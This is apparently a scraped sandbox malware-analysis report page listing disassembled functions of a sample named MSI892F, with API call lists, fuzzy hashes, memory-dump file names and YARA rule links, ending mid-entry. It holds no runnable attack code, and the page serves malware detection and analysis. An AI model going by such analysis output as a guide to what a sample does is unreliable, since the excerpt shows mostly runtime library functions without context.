Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: FreeLocal_strcspn
String ID:
API String ID: 2585785616-0
Opcode ID: d5c4004387b4b8499a945432c399793382e60f23b9d9a8d1fd09a478c5ea6c6e
Instruction ID: e080ba8783c7e597b6275fb87eb794ad55b9a6e02efb90f8c1ac5e1ad87fbd90
Opcode Fuzzy Hash: d5c4004387b4b8499a945432c399793382e60f23b9d9a8d1fd09a478c5ea6c6e
Instruction Fuzzy Hash: 79F12475A00249DFDF14CFA8C984AEEBBF6FF58304F144169E815AB251D731EA85CB90

Function 001D738B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(08E011E3,?,00000000,?), ref: 001D73EE

Part of subcall function 001D002B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001CC527,?,00000000,-00000008), ref: 001D00D7

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001D7649
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001D7691
GetLastError.KERNEL32 ref: 001D7734

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 9bc5ff5c930e61585eecff2dfcde1be0894798e201325a1b94351f6343423d04
Instruction ID: d3e6928aefc68a87dc02f4d505fe9f36355865581fdc23f9aa13a87f1f1353be
Opcode Fuzzy Hash: 9bc5ff5c930e61585eecff2dfcde1be0894798e201325a1b94351f6343423d04
Instruction Fuzzy Hash: 0AD17BB5E046589FCF15CFA8D8809EDBBB5FF48304F18456AE865E7391E730A942CB50

Function 001A8872 Relevance: 6.3, APIs: 4, Instructions: 313COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001A8879
_strcspn.LIBCMT ref: 001A88E4
_strcspn.LIBCMT ref: 001A8904
ctype.LIBCPMT ref: 001A8974

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID:
API String ID: 838279627-0
Opcode ID: 403c6f4df87ed6f905d9e81edc2c2ec726908b75021bd3c99c6652ff39b3eafb
Instruction ID: 5a2c2a375899f581e34c4818e87f256e3e34f8a59da8d07f380d63d8982c89cb
Opcode Fuzzy Hash: 403c6f4df87ed6f905d9e81edc2c2ec726908b75021bd3c99c6652ff39b3eafb
Instruction Fuzzy Hash: CDC16A79D002499FDF14DFA8C981AEEBBB9FF59310F14401AE805AB251DB34AE45CBA1

Function 001A2A16 Relevance: 6.3, APIs: 4, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001A2A1D
_strcspn.LIBCMT ref: 001A2A88
_strcspn.LIBCMT ref: 001A2AA8
ctype.LIBCPMT ref: 001A2B18

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID:
API String ID: 838279627-0
Opcode ID: c1c59c17aaf939214c0093808445839a0df9dcbd156e0c71b04cc80e53166ba7
Instruction ID: a608c2ef6129d46574ff4f573c907da0bfcc0258fa0e32c328f70de87ebf4c78
Opcode Fuzzy Hash: c1c59c17aaf939214c0093808445839a0df9dcbd156e0c71b04cc80e53166ba7
Instruction Fuzzy Hash: A8C18B759002499FDF19DFE8C980AEEBBB9FF5A310F14401AE805AB251D770AE45CBA1

Function 001B4F20 Relevance: 6.3, APIs: 4, Instructions: 277COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001B4F27
collate.LIBCPMT ref: 001B4F33

Part of subcall function 001B3E70: __EH_prolog3_GS.LIBCMT ref: 001B3E77
Part of subcall function 001B3E70: __Getcoll.LIBCPMT ref: 001B3EDB

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

__Getcoll.LIBCPMT ref: 001B4F76

Part of subcall function 001B3CD4: __EH_prolog3.LIBCMT ref: 001B3CDB
Part of subcall function 001B3CD4: std::_Lockit::_Lockit.LIBCPMT ref: 001B3CE5
Part of subcall function 001B3CD4: std::_Lockit::~_Lockit.LIBCPMT ref: 001B3D56

Part of subcall function 001A4403: __EH_prolog3.LIBCMT ref: 001A440A
Part of subcall function 001A4403: std::_Lockit::_Lockit.LIBCPMT ref: 001A4414
Part of subcall function 001A4403: std::_Lockit::~_Lockit.LIBCPMT ref: 001A44BB

numpunct.LIBCPMT ref: 001B51A6

Part of subcall function 001984C0: LocalAlloc.KERNEL32(00000040,00000000,001B839D,00000000,08E011E3,?,00000000,?,00000000,?,001DCB8D,000000FF,?,001917D5,00000000,001DD3BA), ref: 001984C6

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$Getcoll$AllocH_prolog3_Localcollatenumpunct
String ID:
API String ID: 2732324234-0
Opcode ID: fc1bda0b98df776e7834c3361319dc73ffa600e33f97ec9d50de7e694c5d2c4f
Instruction ID: c451b0cd6cc705f544759a31c56a772b21df233fe6f76942ce1a31db3f7251a8
Opcode Fuzzy Hash: fc1bda0b98df776e7834c3361319dc73ffa600e33f97ec9d50de7e694c5d2c4f
Instruction Fuzzy Hash: C8912C71C016159BDB24BB748902BFF7AE9EFA5760F11451EF855A7282DF708E0087E1

Function 001BAFD5 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 001BB09C
___AdjustPointer.LIBCMT ref: 001BB0BF
___AdjustPointer.LIBCMT ref: 001BB15B

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: e7a4f2ea4580a4605488e34ec854b9f590c6950ed342b884072b7607295ac8f9
Instruction ID: 1068278dd18bd541c645e9abf23e5bd18d65291e1db54d44f88c32563a694c0c
Opcode Fuzzy Hash: e7a4f2ea4580a4605488e34ec854b9f590c6950ed342b884072b7607295ac8f9
Instruction Fuzzy Hash: D651AF72A09206AFDB29AF18D891BFA77B4EF14710F14452DFD1286A91D7B1EC81CB90

Function 0019C9B1 Relevance: 6.2, APIs: 4, Instructions: 161COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0019CA1A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0019CA80
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0019CB4F

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Locinfo::_$Locinfo_ctorLocinfo_dtorLockitLockit::_
String ID:
API String ID: 2022693140-0
Opcode ID: 732be374da6d5a60889ba9c95c13d5b13ec7e574b9006e00cc70cd5283cb0dcf
Instruction ID: 817e99d3a87781fac23438bc2ef60e8589c5ece7dfee96c672f092995d57ba06
Opcode Fuzzy Hash: 732be374da6d5a60889ba9c95c13d5b13ec7e574b9006e00cc70cd5283cb0dcf
Instruction Fuzzy Hash: 095183B1D05288EEEF11CFA8C9457DEBFB4AF25344F184099D485B7281E7769A08C7A2

Function 001C7B18 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca292271abd6fe424eb04ef2fb75eacc57d5ed3128a7544c53f9275c91090484
Instruction ID: cb7f352f4caa12e7289f920637baaa9d4a4989a157f462fab03ab506eb104d7f
Opcode Fuzzy Hash: ca292271abd6fe424eb04ef2fb75eacc57d5ed3128a7544c53f9275c91090484
Instruction Fuzzy Hash: B9218171608206AF9B20AF71DC81F6B77A9EF70364710852DF915D7691EBB0EC408FA1

Function 00199020 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,75EF5490,00198B3A,00000000,?,?,?,?,?,?,?,00000000,001DA285,000000FF), ref: 00199027

Strings

Last error=, xrefs: 00199081
> returned:, xrefs: 00199036
Call to ShellExecute() for verb<, xrefs: 00199031

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: ErrorLast
String ID: > returned:$Call to ShellExecute() for verb<$Last error=
API String ID: 1452528299-1781106413
Opcode ID: 908546bd09017fc390053e780574edbb5c418964dc31520066a87ac692baa676
Instruction ID: 77ba44f0c5578c0a78253d523112c4e026666e353ffd4b04e5d2a04c377d1828
Opcode Fuzzy Hash: 908546bd09017fc390053e780574edbb5c418964dc31520066a87ac692baa676
Instruction Fuzzy Hash: FE216D59A202A287CF341F3D844133AA2F4EF54755F29086FE8D9D7395FB698C82C391

Function 001A4403 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A440A
std::_Lockit::_Lockit.LIBCPMT ref: 001A4414
std::_Lockit::~_Lockit.LIBCPMT ref: 001A44BB
Concurrency::cancel_current_task.LIBCPMT ref: 001A44C6

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
String ID:
API String ID: 4244582100-0
Opcode ID: be20a4803a5fc16822eac8acf8f4322c4a7ec1a2a2589acdecb08f23510331f1
Instruction ID: c006accb3f688cb6f6a3cde7a8a1fac8fb172129e60a7842ecbe6ef6051861b2
Opcode Fuzzy Hash: be20a4803a5fc16822eac8acf8f4322c4a7ec1a2a2589acdecb08f23510331f1
Instruction Fuzzy Hash: CC212A38A01A16DFDB04EF24C891A6DB765FF8A710F01845AE9169B7A1CF70ED50CF84

Function 001A1400 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,08E011E3), ref: 001A143C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 001A145C
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 001A148D
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 001A14A6

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: e1e40401e48d87a8ec50ddc86c7f323e1cccd1d68f8ad4e7619d570955d34597
Instruction ID: c664d803496bb4e1ad54d1ee06bed9f9ee9538983eb93cea47eeaaa98f425408
Opcode Fuzzy Hash: e1e40401e48d87a8ec50ddc86c7f323e1cccd1d68f8ad4e7619d570955d34597
Instruction Fuzzy Hash: 3421B174942704ABD7208F14DC09FAABBB8FB45B24F20421AF510A72C0D7B45A45CB98

Function 001A80C5 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A80CC
std::_Lockit::_Lockit.LIBCPMT ref: 001A80D6

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001A8127
std::_Lockit::~_Lockit.LIBCPMT ref: 001A8147

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 264d3b44c57d72712ce4855ae610f5a4286441fcb1bcf09e767764b7242e036f
Instruction ID: 22cdc65a608ad3b39538e674b5632bf1e2f587187fdd5d16f7d32aa12d121825
Opcode Fuzzy Hash: 264d3b44c57d72712ce4855ae610f5a4286441fcb1bcf09e767764b7242e036f
Instruction Fuzzy Hash: 8401D279A04259DFCF04EB68D9456BEB775BFA1720F250409E511AB392DF309E42CBC0

Function 001A815A Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A8161
std::_Lockit::_Lockit.LIBCPMT ref: 001A816B

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001A81BC
std::_Lockit::~_Lockit.LIBCPMT ref: 001A81DC

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 6e37cb8013f655616d44c46e5035291de533a15cb6b8e62822bf4a0e9ed31a16
Instruction ID: 60493bff45c4b84017b23161d1ca057b73112a3e32ac8710a90954f429a3e2c5
Opcode Fuzzy Hash: 6e37cb8013f655616d44c46e5035291de533a15cb6b8e62822bf4a0e9ed31a16
Instruction Fuzzy Hash: 080122799002198FCF04FBA4D8416BEB7B5AFA5720F250009F401AB381DF709E06CB80

Function 001A81EF Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A81F6
std::_Lockit::_Lockit.LIBCPMT ref: 001A8200

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001A8251
std::_Lockit::~_Lockit.LIBCPMT ref: 001A8271

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: dd7017cf1b080b5f47ba2010dfd8fd320c5a4081735eda1dfd458fc1236b2455
Instruction ID: 3bf76fe5b7f7f704b603a7f5174e98943a30cc9b851cb9da62339ac11ff036d1
Opcode Fuzzy Hash: dd7017cf1b080b5f47ba2010dfd8fd320c5a4081735eda1dfd458fc1236b2455
Instruction Fuzzy Hash: CF01D23A9046198BCF05FBA8D9457BEB7B6AFA1710F25040AF811AB291DF709E01CBC0

Function 001A26F9 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A2700
std::_Lockit::_Lockit.LIBCPMT ref: 001A270A

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001A275B
std::_Lockit::~_Lockit.LIBCPMT ref: 001A277B

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 12fae55c678e83a315b180811f558128f9e4bff713586be0ecc89925f41c76e8
Instruction ID: f16aba6828e090cdd3db8adc22bfa6bcd345374658e83d55c1a550b993c9000b
Opcode Fuzzy Hash: 12fae55c678e83a315b180811f558128f9e4bff713586be0ecc89925f41c76e8
Instruction Fuzzy Hash: 1301D2799042199BCF05EBE8D9566BEB7A5AFA5710F240009E410AB391CF709F01CBC0

Function 001A278E Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A2795
std::_Lockit::_Lockit.LIBCPMT ref: 001A279F

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001A27F0
std::_Lockit::~_Lockit.LIBCPMT ref: 001A2810

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 590f1f3f27eb1aaa2e0ea9fbf14f16feb05ace63c5b59aac32ae93362e2577ad
Instruction ID: 00e47d15e76ba6c7af8453024e3d5c5ccbf9d0b90f132047ae42fdc9dd59d27b
Opcode Fuzzy Hash: 590f1f3f27eb1aaa2e0ea9fbf14f16feb05ace63c5b59aac32ae93362e2577ad
Instruction Fuzzy Hash: 7F01D2399042199BCF04FBA8E8456BEB7A5AFA2720F250409F410AB2D2DF349E01CB80

Function 001A79C9 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A79D0
std::_Lockit::_Lockit.LIBCPMT ref: 001A79DA

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001A7A2B
std::_Lockit::~_Lockit.LIBCPMT ref: 001A7A4B

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: fa45e387265e1cf75ee8f9124302987d026d5d2bb35eb1cc2379f2699f54a6fd
Instruction ID: 49d663220f46dfd6cdeaa468c0c681eac096e5da783560a387bd438f66d922ff
Opcode Fuzzy Hash: fa45e387265e1cf75ee8f9124302987d026d5d2bb35eb1cc2379f2699f54a6fd
Instruction Fuzzy Hash: A501D239A082199BCF05EB64D8456BEBB75AFA1720F290409E521AB2D2DF709F41CB80

Function 001B39EB Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001B39F2
std::_Lockit::_Lockit.LIBCPMT ref: 001B39FC

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001B3A4D
std::_Lockit::~_Lockit.LIBCPMT ref: 001B3A6D

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID:
API String ID: 2854358121-0
Opcode ID: 6946d09433f70433448fc493ce6e1ab0d5360cd0af77f499393ee5389e652b3a
Instruction ID: 900841f4187e48d76db41a7a9a8ebd0b7283e8ea98350a0580b569bcfcd40a27
Opcode Fuzzy Hash: 6946d09433f70433448fc493ce6e1ab0d5360cd0af77f499393ee5389e652b3a
Instruction Fuzzy Hash: 9301CC76904219DBCF05EBA8D8456BEBBA6AFA0720F250009F421AB391DF309F01CB80

Function 001A7A5E Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A7A65
std::_Lockit::_Lockit.LIBCPMT ref: 001A7A6F

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

std::_Facet_Register.LIBCPMT ref: 001A7AC0
